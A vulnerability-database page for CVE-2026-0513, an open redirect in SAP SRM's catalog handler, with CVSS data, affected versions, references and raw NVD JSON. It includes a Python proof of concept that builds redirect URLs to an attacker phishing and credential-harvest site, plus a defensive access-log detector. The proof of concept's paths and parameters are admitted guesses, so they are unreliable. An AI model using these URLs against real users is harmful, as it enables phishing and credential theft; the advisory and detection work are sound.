Security Vulnerability Report
CVE-2026-0513 CVSS 4.7 MEDIUM

CVE-2026-0513

Published: 2026-01-13 02:15:54
Last Modified: 2026-01-22 18:48:53

Description

Due to an Open Redirect Vulnerability in SAP Supplier Relationship Management (SICF Handler in SRM Catalog), an unauthenticated attacker could craft a malicious URL that, if accessed by a victim, redirects them to an attacker-controlled site. This causes a low impact on the integrity of the application. Confidentiality and availability are not impacted.

CVSS Details

CVSS Score
4.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:sap:supplier_relationship_management:700:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:sap:supplier_relationship_management:701:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:sap:supplier_relationship_management:702:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:sap:supplier_relationship_management:713:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:sap:supplier_relationship_management:714:*:*:*:*:*:*:* - VULNERABLE
SAP Supplier Relationship Management (SRM) - all unpatched versions
SAP SRM Catalog SICF Handler - see the official SAP security advisory for the specific versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2026-0513 Open Redirect PoC
# Target: SAP Supplier Relationship Management (SRM Catalog)
# Vulnerability: Open Redirect in SICF Handler
import urllib.parse


def generate_open_redirect_poc(base_url, target_domain):
    """
    Generate malicious URLs for an open redirect attack.

    Args:
        base_url: Original SAP SRM application URL
        target_domain: Attacker's controlled domain
    Returns:
        List of candidate malicious redirect URLs (three per handler path)
    """
    # Common SICF Handler paths in SAP SRM
    sicf_paths = [
        "/sap/bc/ui5_ui5/srm/catalog",
        "/sap/bc/ui2/srm/catalog",
        "/sap/opu/odata/sap/SRM_CATALOG",
        "/sap/bc/srt/scs/sap/SRM_CATALOG",
    ]

    malicious_urls = []
    for path in sicf_paths:
        # Open redirect via 'redirect' parameter
        redirect_param = urllib.parse.quote(f"https://{target_domain}/phishing")
        malicious_url = f"{base_url}{path}?redirect={redirect_param}"
        malicious_urls.append(malicious_url)

        # Open redirect via 'url' parameter
        url_param = urllib.parse.quote(f"https://{target_domain}/malware")
        malicious_url2 = f"{base_url}{path}?url={url_param}"
        malicious_urls.append(malicious_url2)

        # Open redirect via 'returnUrl' parameter
        return_param = urllib.parse.quote(f"https://{target_domain}/credential_harvest")
        malicious_url3 = f"{base_url}{path}?returnUrl={return_param}"
        malicious_urls.append(malicious_url3)

    return malicious_urls


# Example usage
base_url = "https://sap-company.com"
target_domain = "attacker-controlled-site.com"

pocs = generate_open_redirect_poc(base_url, target_domain)
print("CVE-2026-0513 Open Redirect Attack URLs:")
for i, poc in enumerate(pocs, 1):
    print(f"{i}. {poc}")

# Simple attack scenario:
# 1. Attacker sends email with malicious link to victim
# 2. Victim clicks link thinking it's legitimate SAP portal
# 3. Browser redirects to attacker's phishing site
# 4. Victim enters credentials on fake login page
# 5. Attacker steals credentials
```
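On the defensive side, the same request shape can be hunted for in web-server access logs. The following detection routine is an added example written for this page, not code from the CVE record, SAP or the PoC author; it assumes the handler paths and parameter names the PoC above guesses at, a common-log-format access log, and an allowlist of hosts (srm.example.com, sso.example.com) that the SRM system may legitimately redirect to.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Handler paths and parameter names as assumed by the PoC above (not confirmed by SAP).
WATCHED_PATHS = {"/sap/bc/ui5_ui5/srm/catalog", "/sap/bc/ui2/srm/catalog",
                 "/sap/opu/odata/sap/SRM_CATALOG", "/sap/bc/srt/scs/sap/SRM_CATALOG"}
REDIRECT_PARAMS = {"redirect", "url", "returnurl"}          # matched case-insensitively
TRUSTED_HOSTS = {"srm.example.com", "sso.example.com"}      # assumed legitimate targets

# Common log format: client ident user [time] "METHOD target HTTP/x" status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

def external_target(value):
    """Return the lower-cased external host a redirect value points at, else None."""
    # Decode once more to catch double-encoding; browsers treat '\' like '/', so
    # 'https:\\evil' and '/\evil' must resolve to a foreign host as well.
    v = unquote(value).strip().replace("\\", "/")
    host = urlsplit(v).hostname          # None for relative paths such as /sap/bc/home
    if host and host.lower() not in TRUSTED_HOSTS:
        return host.lower()
    return None

def scan_access_log(lines):
    """Return (client, path, param, host) for every off-site redirect parameter seen
    on a watched SRM catalog path."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, _method, target, _status = m.groups()
        parts = urlsplit(target)
        if parts.path not in WATCHED_PATHS:
            continue
        for name, values in parse_qs(parts.query, keep_blank_values=True).items():
            if name.lower() in REDIRECT_PARAMS:
                for host in filter(None, map(external_target, values)):
                    findings.append((client, parts.path, name, host))
    return findings

# Constructed sample lines (not real traffic): external target, local path,
# protocol-relative target, trusted host, and an unwatched path.
SAMPLE_LOG = [
    '203.0.113.5 - - [13/Jan/2026:09:12:01 +0000] "GET /sap/bc/ui5_ui5/srm/catalog?redirect=https%3A%2F%2Fattacker-controlled-site.com%2Fphishing HTTP/1.1" 302',
    '198.51.100.7 - - [13/Jan/2026:09:12:04 +0000] "GET /sap/bc/ui5_ui5/srm/catalog?returnUrl=%2Fsap%2Fbc%2Fhome HTTP/1.1" 302',
    '198.51.100.9 - - [13/Jan/2026:09:12:09 +0000] "GET /sap/opu/odata/sap/SRM_CATALOG?url=//evil.example%2Fx HTTP/1.1" 302',
    '192.0.2.4 - - [13/Jan/2026:09:12:15 +0000] "GET /sap/bc/ui5_ui5/srm/catalog?url=https://srm.example.com/cart HTTP/1.1" 200',
    '192.0.2.8 - - [13/Jan/2026:09:13:00 +0000] "GET /sap/bc/gui/sap/its/webgui?url=https://evil.example/ HTTP/1.1" 200',
]
```

Running `scan_access_log(SAMPLE_LOG)` flags only the first and third lines; the relative return path, the allowlisted host and the unwatched handler are left alone.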

References

https://me.sap.com/notes/3638716 (Permissions Required)
https://url.sap/sapsecuritypatchday (Patch, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-0513", "sourceIdentifier": "[email protected]", "published": "2026-01-13T02:15:53.957", "lastModified": "2026-01-22T18:48:53.343", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Due to an Open Redirect Vulnerability in SAP Supplier Relationship Management (SICF Handler in SRM Catalog), an unauthenticated attacker could craft a malicious URL that, if accessed by a victim, redirects them to an attacker-controlled site.This causes low impact on integrity of the application. Confidentiality and availability are not impacted."}, {"lang": "es", "value": "Debido a una Vulnerabilidad de Redirección Abierta en SAP Supplier Relationship Management (controlador SICF en el catálogo SRM), un atacante no autenticado podría elaborar una URL maliciosa que, si es accedida por una víctima, la redirige a un sitio controlado por el atacante. Esto causa bajo impacto en la integridad de la aplicación. La confidencialidad y la disponibilidad no tienen impacto."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": 
[{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-601"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sap:supplier_relationship_management:700:*:*:*:*:*:*:*", "matchCriteriaId": "069741F5-9DC2-442A-B48B-B0C68A3A6950"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sap:supplier_relationship_management:701:*:*:*:*:*:*:*", "matchCriteriaId": "0C2110DB-3940-47AF-B878-EB8C6B4E8522"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sap:supplier_relationship_management:702:*:*:*:*:*:*:*", "matchCriteriaId": "292B51A4-91A2-49C7-A31D-C70DEB620FEB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sap:supplier_relationship_management:713:*:*:*:*:*:*:*", "matchCriteriaId": "D9A86731-3213-4ACD-968E-0EA7BEA1192D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sap:supplier_relationship_management:714:*:*:*:*:*:*:*", "matchCriteriaId": "EEE98FDD-55FA-4F88-AD58-7FE927129F97"}]}]}], "references": [{"url": "https://me.sap.com/notes/3638716", "source": "[email protected]", "tags": ["Permissions Required"]}, {"url": "https://url.sap/sapsecuritypatchday", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}